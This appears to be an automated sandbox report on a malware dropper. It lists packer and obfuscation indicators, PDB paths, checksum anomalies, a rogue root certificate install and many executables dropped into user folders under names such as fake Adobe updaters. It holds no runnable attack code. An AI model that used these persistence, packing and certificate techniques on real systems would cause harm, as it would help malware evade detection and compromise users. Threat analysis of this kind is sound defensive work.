Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2746107478.0000000068E44000.00000002.00000001.01000000.00000021.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004501000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547368675.00000000005A4000.00000040.00000001.01000000.00000006.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3127380532.00000000005EB000.00000040.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538173466.000000000059E000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Xml.pdb source: is-OFQC1.tmp.25.dr
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: WlCIinu0yp.exe
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\kkelsch\Documents\PushNotifications\PushSharp\PushSharp-master\PushSharp.Core\obj\Debug\PushSharp.Core.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2703885312.0000000005DCA000.00000004.08000000.00040000.00000000.sdmp, pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000002.2417687969.0000000004C88000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\Microsoft Enterprise Library January 2006\src\Data\obj\Debug\Microsoft.Practices.EnterpriseLibrary.Data.pdb source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb source: is-280SC.tmp.25.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Unpacked PE file: 7.2.hvkESMr10WtP7_E6btIJmDx0.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Unpacked PE file: 12.2.ZzpT5hwyVjlAXfLjB1r1iwOX.exe.900000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Unpacked PE file: 16.2.H14SDf_AWcPvvQK5Xx97sISX.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Unpacked PE file: 22.2.rYuCm9r3mZzk_0VrthAnPu8c.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	Unpacked PE file: 46.2.softjenimmp3converter.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.libcc1:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe

Unpacked PE file: 46.2.softjenimmp3converter.exe.400000.0.unpack

Binary contains a suspicious time stamp

Source: ydYqwUL3GNS6IHkMgIteny78.exe.0.dr

Static PE information: 0xC2FA201D [Mon Aug 28 18:55:25 2073 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_00418BB0 LoadLibraryA,GetProcAddress,

7_2_00418BB0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .themida

PE file contains an invalid checksum

Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x5b5a0
Source: q9Sc3pS9TsI8vZtTlbAuGG_b.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x74bbb1
Source: 0kNDw1qtthM70owdcV01L1ro.exe.0.dr	Static PE information: real checksum: 0x41d363 should be: 0x41c252
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4f5bd9
Source: 7725eaa6592c80f8124e769b4e8a07f7[1].exe.0.dr	Static PE information: real checksum: 0x41d363 should be: 0x41c252
Source: MSIUpdaterV202.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: lumma2804[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: setup[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x74bbb1
Source: ydYqwUL3GNS6IHkMgIteny78.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1458c
Source: 6JeTTVCBi2pYO9g7t24p.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: AdobeUpdaterV202.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x7cd8c
Source: aeb24096[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xb3e71
Source: lmmycYk2THJ6kqlicmdyWtVT.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xb3e71
Source: 060[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4f5bd9
Source: cad54ba5b01423b1af8ec10ab5719d97[1].exe.0.dr	Static PE information: real checksum: 0x41d363 should be: 0x422cc4
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x311de9
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x821d7
Source: fiona[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x311de9
Source: njeL_S54LMD1B6b6sdXBUgG6.exe.0.dr	Static PE information: real checksum: 0x41d363 should be: 0x422cc4

PE file contains sections with non-standard names

Source: WlCIinu0yp.exe	Static PE information: section name:
Source: WlCIinu0yp.exe	Static PE information: section name:
Source: WlCIinu0yp.exe	Static PE information: section name: .themida
Source: Retailer_prog[1].exe.0.dr	Static PE information: section name: .MPRESS1
Source: Retailer_prog[1].exe.0.dr	Static PE information: section name: .MPRESS2
Source: H14SDf_AWcPvvQK5Xx97sISX.exe.0.dr	Static PE information: section name: .MPRESS1
Source: H14SDf_AWcPvvQK5Xx97sISX.exe.0.dr	Static PE information: section name: .MPRESS2
Source: Default12_big[1].exe.0.dr	Static PE information: section name: .MPRESS1
Source: Default12_big[1].exe.0.dr	Static PE information: section name: .MPRESS2
Source: hvkESMr10WtP7_E6btIJmDx0.exe.0.dr	Static PE information: section name: .MPRESS1
Source: hvkESMr10WtP7_E6btIJmDx0.exe.0.dr	Static PE information: section name: .MPRESS2
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: fiona[1].exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name:
Source: 123p[1].exe.0.dr	Static PE information: section name: .00cfg
Source: 123p[1].exe.0.dr	Static PE information: section name: .text0
Source: 123p[1].exe.0.dr	Static PE information: section name: .text1
Source: 123p[1].exe.0.dr	Static PE information: section name: .text2
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr	Static PE information: section name: .00cfg
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr	Static PE information: section name: .text0
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr	Static PE information: section name: .text1
Source: 0aUjr05rR32eKJo8dvN8X8hr.exe.0.dr	Static PE information: section name: .text2
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe.0.dr	Static PE information: section name: .Right
Source: 9RJ0JeM9uj2rfsuq_woBmmIY.exe.0.dr	Static PE information: section name: .Shine
Source: ifM1E2HUtOYe96efnF4a_sDH.exe.0.dr	Static PE information: section name: .vmp1024
Source: ifM1E2HUtOYe96efnF4a_sDH.exe.0.dr	Static PE information: section name: .vmp1024
Source: setup[1].exe.0.dr	Static PE information: section name: .sxdata
Source: q9Sc3pS9TsI8vZtTlbAuGG_b.exe.0.dr	Static PE information: section name: .sxdata
Source: Space1.9_big[1].exe.0.dr	Static PE information: section name: .MPRESS1
Source: Space1.9_big[1].exe.0.dr	Static PE information: section name: .MPRESS2
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe.0.dr	Static PE information: section name: .MPRESS1
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe.0.dr	Static PE information: section name: .MPRESS2

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BE177 push ebp; mov dword ptr [esp], 00000004h	7_2_0096D884
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0070415A push esi; mov dword ptr [esp], ecx	7_2_00971463
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006C9129 push ecx; mov dword ptr [esp], 659B8DACh	7_2_00995BA3
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005FE137 push 65E6F80Ah; mov dword ptr [esp], eax	7_2_009A824D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005FE137 push 6AD2D916h; mov dword ptr [esp], ecx	7_2_009B59B7
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005F51F9 push 028D9D34h; mov dword ptr [esp], edx	7_2_009B6F69
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004DD189 push ecx; ret	7_2_004DD19C
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_007111A6 push 2B03A790h; mov dword ptr [esp], edi	7_2_00988941
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005CF185 push esi; mov dword ptr [esp], 0F6E47D3h	7_2_009BA4F6
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005B4223 push 1B0273DFh; mov dword ptr [esp], esi	7_2_0099CE7E
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006B234A push ecx; mov dword ptr [esp], edx	7_2_009B19CE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006B234A push eax; mov dword ptr [esp], edx	7_2_009B19E8
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005F939D push 62D5C5BCh; mov dword ptr [esp], edi	7_2_009B0759
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006C339B push 04BD78A0h; mov dword ptr [esp], ebx	7_2_009989EE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005FA449 push 12672850h; mov dword ptr [esp], edi	7_2_009AEB84
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_00718415 push ebx; mov dword ptr [esp], edi	7_2_009A5ED6
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BF4C8 push esi; mov dword ptr [esp], 6B355F99h	7_2_0098D96D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005B5579 push edx; mov dword ptr [esp], ecx	7_2_009B1043
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BB50B push ebx; mov dword ptr [esp], ecx	7_2_009BCA3D
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005E0523 push 31E0CF80h; mov dword ptr [esp], esp	7_2_00990856
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005E0523 push 74CF83F9h; mov dword ptr [esp], ecx	7_2_009B7503
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005CB652 push 41EB57B3h; mov dword ptr [esp], ecx	7_2_009B50E6
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005E36DA push ebp; mov dword ptr [esp], eax	7_2_009B9534
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BB6CB push eax; mov dword ptr [esp], ecx	7_2_009B0F29
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BB6CB push 25FCB98Bh; mov dword ptr [esp], ebp	7_2_009B42F1
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0060269F push ebp; mov dword ptr [esp], eax	7_2_009B63D3
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0060269F push ebx; mov dword ptr [esp], edi	7_2_009B63DE
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0060269F push 2D75C53Eh; mov dword ptr [esp], edi	7_2_009BC38F
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_006BB775 push 4E0FB89Eh; mov dword ptr [esp], ebp	7_2_009B9490
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_005C77DE push esi; mov dword ptr [esp], edi	7_2_009ACCF0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_007C97DE push ebx; mov dword ptr [esp], ecx	7_2_009829F9

Source: WlCIinu0yp.exe	Static PE information: section name: entropy: 7.282847728316021
Source: fiona[1].exe.0.dr	Static PE information: section name: entropy: 7.99971394901448
Source: fiona[1].exe.0.dr	Static PE information: section name: entropy: 7.991451211560384
Source: fiona[1].exe.0.dr	Static PE information: section name: entropy: 7.81952942947184
Source: fiona[1].exe.0.dr	Static PE information: section name: entropy: 7.993366885563393
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name: entropy: 7.99971394901448
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name: entropy: 7.991451211560384
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name: entropy: 7.81952942947184
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe.0.dr	Static PE information: section name: entropy: 7.993366885563393

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe	Jump to dropped file

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Drops PE files

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Default12_big[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\aeb24096[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	File created: C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-280SC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	File created: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-FREGM.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-8REGQ.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	File created: C:\ProgramData\MPGPH131\MPGPH131.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libmp3lame.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	File created: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-V4HAL.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	File created: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HPQQQ.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Space1.9_big[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp120.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\7725eaa6592c80f8124e769b4e8a07f7[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Xml.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OFQC1.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-5QCAU.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fiona[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-7LPN0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	File created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-T59CT.tmp	Jump to dropped file
